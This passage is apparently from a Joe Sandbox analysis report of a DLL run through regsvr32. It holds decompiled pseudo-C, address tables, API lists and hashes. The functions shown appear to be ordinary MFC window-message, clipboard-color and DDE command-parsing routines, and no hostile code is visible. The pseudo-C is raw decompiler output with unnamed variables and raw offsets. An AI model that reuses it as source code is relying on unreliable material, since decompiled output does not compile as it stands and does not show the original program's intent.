                                                                                                                													 *(_t192 + 0x48) = E10009F14(__eflags, 0x30);
                                                                                                                													E10049170(_t192, _t134, 0, 0x30);
                                                                                                                													_t207 = _t207 + 0x10;
                                                                                                                												}
                                                                                                                												_t176 = 0xc;
                                                                                                                												_t200 = _t204 - 0x58;
                                                                                                                												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
                                                                                                                												_t192 = _t200 + _t176 + _t176;
                                                                                                                												L45:
                                                                                                                												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
                                                                                                                												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
                                                                                                                													__eflags =  *(_t204 - 0x38);
                                                                                                                													if(__eflags == 0) {
                                                                                                                														_push( *((intOrPtr*)(_t204 - 0x34)));
                                                                                                                														_t109 = E100470E9(_t164, _t192, _t200, __eflags);
                                                                                                                													}
                                                                                                                												}
                                                                                                                												goto L77;
                                                                                                                											}
                                                                                                                											_t179 = 0xc;
                                                                                                                											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
                                                                                                                											_t207 = _t207 + 0xc;
                                                                                                                											_t181 =  *(_t204 - 0x10);
                                                                                                                											_t139 = _t138 & 0x3fffffff;
                                                                                                                											__eflags =  *(_t181 + 0x3c) & 0x00000400;
                                                                                                                											 *(_t204 - 0x84) = _t139;
                                                                                                                											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
                                                                                                                												_t148 = _t139 | 0x00000020;
                                                                                                                												__eflags = _t148;
                                                                                                                												 *(_t204 - 0x84) = _t148;
                                                                                                                											}
                                                                                                                											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
                                                                                                                											__eflags =  *(_t204 - 0x54) & 0x40000000;
                                                                                                                											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
                                                                                                                												L35:
                                                                                                                												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
                                                                                                                												_t143 =  *(_t204 - 0x10);
                                                                                                                												__eflags =  *(_t143 + 0x3c) & 0x00000400;
                                                                                                                												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
                                                                                                                													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
                                                                                                                												}
                                                                                                                												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
                                                                                                                												goto L38;
                                                                                                                											} else {
                                                                                                                												_t147 = E10016A68(_t164,  *(_t204 - 0x10), 0x400);
                                                                                                                												__eflags = _t147;
                                                                                                                												if(_t147 == 0) {
                                                                                                                													L38:
                                                                                                                													_t192 =  *((intOrPtr*)(_t204 - 0x18));
                                                                                                                													goto L39;
                                                                                                                												}
                                                                                                                												goto L35;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										__eflags =  *(_t192 + 0x40) - _t175;
                                                                                                                										if( *(_t192 + 0x40) != _t175) {
                                                                                                                											goto L30;
                                                                                                                										}
                                                                                                                										__eflags =  *(_t200 + 0x3c) & 0x00000400;
                                                                                                                										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
                                                                                                                											__eflags = _t109 - 0xffffffff;
                                                                                                                											if(_t109 != 0xffffffff) {
                                                                                                                												_t109 = E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											GetCursorPos(_t204 - 0x20);
                                                                                                                											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
                                                                                                                										}
                                                                                                                										goto L45;
                                                                                                                									} else {
                                                                                                                										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t156 = E100155FD(_t164);
                                                                                                                								__eflags = _t156 -  *(_t204 - 0x14);
                                                                                                                								if(_t156 !=  *(_t204 - 0x14)) {
                                                                                                                									 *((intOrPtr*)( *_t164 + 0x60))();
                                                                                                                									 *((intOrPtr*)( *_t164 + 4))(1);
                                                                                                                									_t164 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									 *(_t192 + 0x3c) = 0;
                                                                                                                								}
                                                                                                                								__eflags = _t164;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L24;
                                                                                                                								} else {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t109 == 0) {
                                                                                                                									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
                                                                                                                									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
                                                                                                                								}
                                                                                                                								goto L77;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L50:
                                                                                                                					__eflags =  *(_t200 + 0x3c) & 0x00000401;
                                                                                                                					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
                                                                                                                						L77:
                                                                                                                						return E10047725(_t109);
                                                                                                                					}
                                                                                                                					_push( *_t163);
                                                                                                                					while(1) {
                                                                                                                						_t109 = E10013FEA(_t163, _t165, _t204);
                                                                                                                						__eflags = _t109;
                                                                                                                						if(_t109 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t109 - _t200;
                                                                                                                						if(_t109 == _t200) {
                                                                                                                							L57:
                                                                                                                							__eflags = _t190 - 0x100;
                                                                                                                							if(_t190 < 0x100) {
                                                                                                                								L59:
                                                                                                                								__eflags = _t190 - 0x104 - 3;
                                                                                                                								if(_t190 - 0x104 > 3) {
                                                                                                                									_t109 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									L62:
                                                                                                                									__eflags =  *(_t200 + 0x3c) & 0x00000400;
                                                                                                                									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									__eflags = _t109;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										L76:
                                                                                                                										_t109 = E100129EF(_t165, __eflags, _t109);
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x201;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x203;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x204;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x206;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x207;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0x209;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa1;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa3;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa4;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa6;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa7;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									__eflags = _t190 - 0xa9;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L77;
                                                                                                                									}
                                                                                                                									goto L76;
                                                                                                                								}
                                                                                                                								L60:
                                                                                                                								_t109 = 1;
                                                                                                                								goto L62;
                                                                                                                							}
                                                                                                                							__eflags = _t190 - 0x109;
                                                                                                                							if(_t190 <= 0x109) {
                                                                                                                								goto L60;
                                                                                                                							}
                                                                                                                							goto L59;
                                                                                                                						}
                                                                                                                						__eflags =  *(_t109 + 0x3c) & 0x00000401;
                                                                                                                						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_push(GetParent( *(_t109 + 0x20)));
                                                                                                                					}
                                                                                                                					__eflags = _t109 - _t200;
                                                                                                                					if(_t109 != _t200) {
                                                                                                                						goto L77;
                                                                                                                					}
                                                                                                                					goto L57;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                0x1004659b
                                                                                                                0x100465a0
                                                                                                                0x100465a3
                                                                                                                0x100465a9
                                                                                                                0x100465b2
                                                                                                                0x100465b5
                                                                                                                0x100465b5
                                                                                                                0x100465b7
                                                                                                                0x100465b7
                                                                                                                0x100465ba
                                                                                                                0x100465bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046574
                                                                                                                0x10046576
                                                                                                                0x1004657c
                                                                                                                0x1004657f
                                                                                                                0x1004657f
                                                                                                                0x00000000
                                                                                                                0x10046576
                                                                                                                0x10046572
                                                                                                                0x10046541
                                                                                                                0x10046817
                                                                                                                0x10046817
                                                                                                                0x10046817
                                                                                                                0x1004681d
                                                                                                                0x100468e2
                                                                                                                0x100468e7
                                                                                                                0x100468e7
                                                                                                                0x10046823
                                                                                                                0x1004683d
                                                                                                                0x1004683d
                                                                                                                0x10046842
                                                                                                                0x10046844
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046827
                                                                                                                0x10046829
                                                                                                                0x1004684e
                                                                                                                0x1004684e
                                                                                                                0x10046854
                                                                                                                0x1004685e
                                                                                                                0x10046864
                                                                                                                0x10046867
                                                                                                                0x1004686e
                                                                                                                0x1004686e
                                                                                                                0x10046870
                                                                                                                0x10046870
                                                                                                                0x10046876
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046878
                                                                                                                0x1004687a
                                                                                                                0x100468dc
                                                                                                                0x100468dd
                                                                                                                0x00000000
                                                                                                                0x100468dd
                                                                                                                0x1004687c
                                                                                                                0x10046882
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046884
                                                                                                                0x1004688a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004688c
                                                                                                                0x10046892
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046894
                                                                                                                0x1004689a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004689c
                                                                                                                0x100468a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468a4
                                                                                                                0x100468aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468ac
                                                                                                                0x100468b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468b4
                                                                                                                0x100468ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468bc
                                                                                                                0x100468c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468c4
                                                                                                                0x100468ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468cc
                                                                                                                0x100468d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468d4
                                                                                                                0x100468da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468da
                                                                                                                0x10046869
                                                                                                                0x1004686b
                                                                                                                0x00000000
                                                                                                                0x1004686b
                                                                                                                0x10046856
                                                                                                                0x1004685c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004685c
                                                                                                                0x1004682b
                                                                                                                0x10046831
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004683c
                                                                                                                0x1004683c
                                                                                                                0x10046846
                                                                                                                0x10046848
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046848

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2864161637-3887548279
                                                                                                                • Opcode ID: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
                                                                                                                • Instruction ID: 4716ce11059b1d6aff665851ae5c4938c3b5f43c6bbf43757ff83e482e918513
                                                                                                                • Opcode Fuzzy Hash: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
                                                                                                                • Instruction Fuzzy Hash: FAC18DB1A00616DBEB50CFA4CC85B9D77B5EF08750F214279E905EB1A1EB71A840CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E1000105A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                				void* _t30;
                                                                                                                				int _t50;
                                                                                                                				void* _t82;
                                                                                                                				signed int _t85;
                                                                                                                				void* _t86;
                                                                                                                				void* _t88;
                                                                                                                				intOrPtr _t89;
                                                                                                                				void* _t90;
                                                                                                                				void* _t93;
                                                                                                                
                                                                                                                				_t93 = __eflags;
                                                                                                                				_t82 = __edx;
                                                                                                                				_push(0x14);
                                                                                                                				E1004764D(0x1008dad3, __ebx, __edi, __esi);
                                                                                                                				_t88 = __ecx;
                                                                                                                				_t30 = E10001041(__ecx + 0x148);
                                                                                                                				_t65 = 0xff - _t30;
                                                                                                                				 *((intOrPtr*)(_t90 - 0x14)) = 0xff - E10001041(__ecx + 0x250);
                                                                                                                				 *((intOrPtr*)(_t90 - 0x18)) = 0xff - E10001041(__ecx + 0x2d4);
                                                                                                                				_t85 = 0 << 0x00000008 | 0x000000ff - _t30 & 0x000000ff;
                                                                                                                				L1000140B(_t90 - 0x1c, E100184C0());
                                                                                                                				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
                                                                                                                				_push(_t90 - 0x10);
                                                                                                                				_push(_t85);
                                                                                                                				_push(_t90 - 0x20);
                                                                                                                				L100012F3(0xff - _t30, _t85, __ecx, _t93, __fp0);
                                                                                                                				_push( *((intOrPtr*)(_t90 - 0x18)));
                                                                                                                				_push( *((intOrPtr*)(_t90 - 0x14)));
                                                                                                                				_push(0xff);
                                                                                                                				_push(_t85);
                                                                                                                				_push( *(_t90 - 0x10) >> 0x00000010 & 0x000000ff);
                                                                                                                				_push( *(_t90 - 0xf) & 0x000000ff);
                                                                                                                				_push( *(_t90 - 0x10) & 0x000000ff);
                                                                                                                				_push( *((intOrPtr*)(_t90 - 0x20)));
                                                                                                                				_push( *((intOrPtr*)(_t90 - 0x18)));
                                                                                                                				 *(_t90 - 4) = 1;
                                                                                                                				_push( *((intOrPtr*)(_t90 - 0x14)));
                                                                                                                				L1000106E(_t90 - 0x1c, "RGB( %d, %d, %d );\t// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X", _t65);
                                                                                                                				_t50 = OpenClipboard( *(_t88 + 0x20));
                                                                                                                				_t89 =  *((intOrPtr*)(_t90 - 0x1c));
                                                                                                                				if(_t50 != 0) {
                                                                                                                					EmptyClipboard();
                                                                                                                					_t86 = GlobalAlloc(0x2000,  *((intOrPtr*)(_t89 - 0xc)) + 1);
                                                                                                                					E100486D0(GlobalLock(_t86), _t89);
                                                                                                                					GlobalUnlock(_t86);
                                                                                                                					SetClipboardData(1, _t86);
                                                                                                                					CloseClipboard();
                                                                                                                				}
                                                                                                                				L100013E3( *((intOrPtr*)(_t90 - 0x20)) + 0xfffffff0, _t82);
                                                                                                                				return E10047725(L100013E3(_t89 - 0x10, _t82));
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10008AE5
                                                                                                                  • Part of subcall function 10001041: SendMessageA.USER32 ref: 10001CFD
                                                                                                                • OpenClipboard.USER32(?), ref: 10008B96
                                                                                                                • EmptyClipboard.USER32 ref: 10008BA3
                                                                                                                • GlobalAlloc.KERNEL32(00002000,?), ref: 10008BB3
                                                                                                                • GlobalLock.KERNEL32 ref: 10008BBC
                                                                                                                • _strcat.LIBCMT ref: 10008BC4
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 10008BCC
                                                                                                                • SetClipboardData.USER32 ref: 10008BD5
                                                                                                                • CloseClipboard.USER32 ref: 10008BDB
                                                                                                                Strings
                                                                                                                • RGB( %d, %d, %d );// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X, xrefs: 10008B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$AllocCloseDataEmptyH_prolog3LockMessageOpenSendUnlock_strcat
                                                                                                                • String ID: RGB( %d, %d, %d );// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1002870B(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t208;
                                                                                                                				signed int _t209;
                                                                                                                				void* _t212;
                                                                                                                				signed int _t213;
                                                                                                                				void* _t216;
                                                                                                                				signed int _t217;
                                                                                                                				intOrPtr _t221;
                                                                                                                				void* _t227;
                                                                                                                				void* _t232;
                                                                                                                				void* _t239;
                                                                                                                				intOrPtr _t243;
                                                                                                                				void* _t248;
                                                                                                                				void* _t259;
                                                                                                                				void* _t272;
                                                                                                                				signed int _t273;
                                                                                                                				void* _t279;
                                                                                                                				void* _t284;
                                                                                                                				void* _t291;
                                                                                                                				void* _t295;
                                                                                                                				signed int _t296;
                                                                                                                				void* _t302;
                                                                                                                				void* _t307;
                                                                                                                				void* _t314;
                                                                                                                				void* _t318;
                                                                                                                				signed int _t319;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                				void* _t330;
                                                                                                                				void* _t337;
                                                                                                                				signed int _t344;
                                                                                                                				intOrPtr* _t347;
                                                                                                                				void* _t349;
                                                                                                                				void* _t386;
                                                                                                                				void* _t390;
                                                                                                                				intOrPtr* _t471;
                                                                                                                				intOrPtr _t478;
                                                                                                                				intOrPtr _t480;
                                                                                                                				void* _t484;
                                                                                                                				void* _t485;
                                                                                                                
                                                                                                                				_t485 = __eflags;
                                                                                                                				_t477 = __esi;
                                                                                                                				_t474 = __edx;
                                                                                                                				_push(0x34);
                                                                                                                				E1004764D(0x1008fe1e, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t484 - 0x14)) = __ecx;
                                                                                                                				_push( *((intOrPtr*)(_t484 + 8)));
                                                                                                                				E1000B543(__ebx, _t484 + 8, __edi, __esi, _t485);
                                                                                                                				 *((intOrPtr*)(_t484 - 4)) = 0;
                                                                                                                				E10019CFD(_t484 - 0x40);
                                                                                                                				 *((char*)(_t484 - 4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t484 - 0x30)) = 4;
                                                                                                                				_t208 = E10027DD9(_t484 + 8, _t484 - 0x18, 7);
                                                                                                                				 *((char*)(_t484 - 4)) = 2;
                                                                                                                				_t209 = E1001BBE2(__ebx, _t208, __edx, 0, __esi, _t484, "[open(\"");
                                                                                                                				asm("sbb bl, bl");
                                                                                                                				_t370 =  ~_t209 + 1;
                                                                                                                				 *((char*)(_t484 - 4)) = 1;
                                                                                                                				L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, __edx);
                                                                                                                				_t386 = _t484 + 8;
                                                                                                                				if( ~_t209 + 1 == 0) {
                                                                                                                					_t212 = E10027DD9(_t386, _t484 - 0x18, 8);
                                                                                                                					 *((char*)(_t484 - 4)) = 4;
                                                                                                                					_t213 = E1001BBE2(_t370, _t212, __edx, 0, __esi, _t484, "[print(\"");
                                                                                                                					asm("sbb bl, bl");
                                                                                                                					_t373 =  ~_t213 + 1;
                                                                                                                					 *((char*)(_t484 - 4)) = 1;
                                                                                                                					L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, __edx);
                                                                                                                					__eflags =  ~_t213 + 1;
                                                                                                                					_t390 = _t484 + 8;
                                                                                                                					if( ~_t213 + 1 == 0) {
                                                                                                                						_t216 = E10027DD9(_t390, _t484 - 0x18, 0xa);
                                                                                                                						 *((char*)(_t484 - 4)) = 6;
                                                                                                                						_t217 = E1001BBE2(_t373, _t216, _t474, 0, _t477, _t484, "[printto(\"");
                                                                                                                						asm("sbb bl, bl");
                                                                                                                						_t373 =  ~_t217 + 1;
                                                                                                                						 *((char*)(_t484 - 4)) = 1;
                                                                                                                						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
                                                                                                                						__eflags =  ~_t217 + 1;
                                                                                                                						if( ~_t217 + 1 == 0) {
                                                                                                                							L33:
                                                                                                                							 *((char*)(_t484 - 4)) = 0;
                                                                                                                							E10019D3C(_t484 - 0x40, _t474);
                                                                                                                							L100013E3( *((intOrPtr*)(_t484 + 8)) + 0xfffffff0, _t474);
                                                                                                                							_t221 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                							L34:
                                                                                                                							return E10047725(_t221);
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t484 - 0x30)) = 3;
                                                                                                                						__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff6;
                                                                                                                						_t227 = E10027D93(_t484 + 8, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff6);
                                                                                                                						 *((char*)(_t484 - 4)) = 7;
                                                                                                                						L6:
                                                                                                                						E10018A1F(_t373, _t484 + 8, _t484, _t227);
                                                                                                                						 *((char*)(_t484 - 4)) = 1;
                                                                                                                						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
                                                                                                                						_t478 = E10027BB5(_t484 + 8, 0x22, 0);
                                                                                                                						_t487 = _t478 - 0xffffffff;
                                                                                                                						if(_t478 == 0xffffffff) {
                                                                                                                							goto L33;
                                                                                                                						}
                                                                                                                						_t232 = E10027DD9(_t484 + 8, _t484 - 0x18, _t478);
                                                                                                                						 *((char*)(_t484 - 4)) = 8;
                                                                                                                						E10018A1F(_t373, _t484 - 0x2c, _t484, _t232);
                                                                                                                						 *((char*)(_t484 - 4)) = 1;
                                                                                                                						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
                                                                                                                						_t239 = E10027D93(_t484 + 8, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t478);
                                                                                                                						 *((char*)(_t484 - 4)) = 9;
                                                                                                                						E10018A1F(_t373, _t484 + 8, _t484, _t239);
                                                                                                                						 *((char*)(_t484 - 4)) = 1;
                                                                                                                						L100013E3( *((intOrPtr*)(_t484 - 0x18)) + 0xfffffff0, _t474);
                                                                                                                						 *((intOrPtr*)(_t484 - 0x18)) = 0;
                                                                                                                						 *((intOrPtr*)(_t484 - 0x10)) = 1;
                                                                                                                						_t243 =  *((intOrPtr*)(E1001E302(1, 0, _t478, _t487) + 4));
                                                                                                                						_t488 =  *((intOrPtr*)(_t243 + 0x8c));
                                                                                                                						if( *((intOrPtr*)(_t243 + 0x8c)) == 0) {
                                                                                                                							 *((intOrPtr*)(_t484 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, __eflags) + 4)) + 0x8c));
                                                                                                                						} else {
                                                                                                                							_t478 =  *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4));
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4)) + 0x4c)) =  *((intOrPtr*)(_t478 + 0x8c));
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(1, 0, _t478, _t488) + 4)) + 0x8c)) = _t484 - 0x40;
                                                                                                                						}
                                                                                                                						_t489 =  *((intOrPtr*)(_t484 - 0x30)) - 1;
                                                                                                                						if( *((intOrPtr*)(_t484 - 0x30)) != 1) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t484 - 0x30)) - 3;
                                                                                                                							if( *((intOrPtr*)(_t484 - 0x30)) != 3) {
                                                                                                                								L28:
                                                                                                                								_t479 = E10027822( *((intOrPtr*)(_t484 - 0x14)));
                                                                                                                								_t248 = E1001E302(1, 0, _t479, __eflags);
                                                                                                                								_t474 =  *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))));
                                                                                                                								_t378 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t248 + 4)))) + 0x88))( *((intOrPtr*)(_t484 - 0x2c)));
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x8c)) = _t484 - 0x40;
                                                                                                                								SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x20)) + 0x20), 0x111, 0xe108, 0);
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x8c)) = 0;
                                                                                                                								_t259 = E10027822( *((intOrPtr*)(_t484 - 0x14)));
                                                                                                                								__eflags = _t259 - _t479;
                                                                                                                								if(_t259 > _t479) {
                                                                                                                									 *((intOrPtr*)( *_t378 + 0x7c))();
                                                                                                                								}
                                                                                                                								__eflags = E10022028();
                                                                                                                								if(__eflags == 0) {
                                                                                                                									PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, __eflags) + 4)) + 0x20)) + 0x20), 0x10, 0, 0);
                                                                                                                								}
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							_t272 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
                                                                                                                							_t479 = 0x1009db20;
                                                                                                                							 *((char*)(_t484 - 4)) = 0xa;
                                                                                                                							_t273 = E1001BBE2(1, _t272, _t474, 0, 0x1009db20, _t484, 0x1009db20);
                                                                                                                							__eflags = _t273;
                                                                                                                							_t378 = 0 | _t273 != 0x00000000;
                                                                                                                							 *((char*)(_t484 - 4)) = 1;
                                                                                                                							L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                							__eflags = _t273 != 0;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t279 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
                                                                                                                								 *((char*)(_t484 - 4)) = 0xb;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t279);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t378 = E10027BB5(_t484 + 8, 0x22, 0);
                                                                                                                								__eflags = _t378 - 0xffffffff;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								_t284 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t378);
                                                                                                                								 *((char*)(_t484 - 4)) = 0xc;
                                                                                                                								E10018A1F(_t378, _t484 - 0x28, _t484, _t284);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t291 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t378);
                                                                                                                								 *((char*)(_t484 - 4)) = 0xd;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t291);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
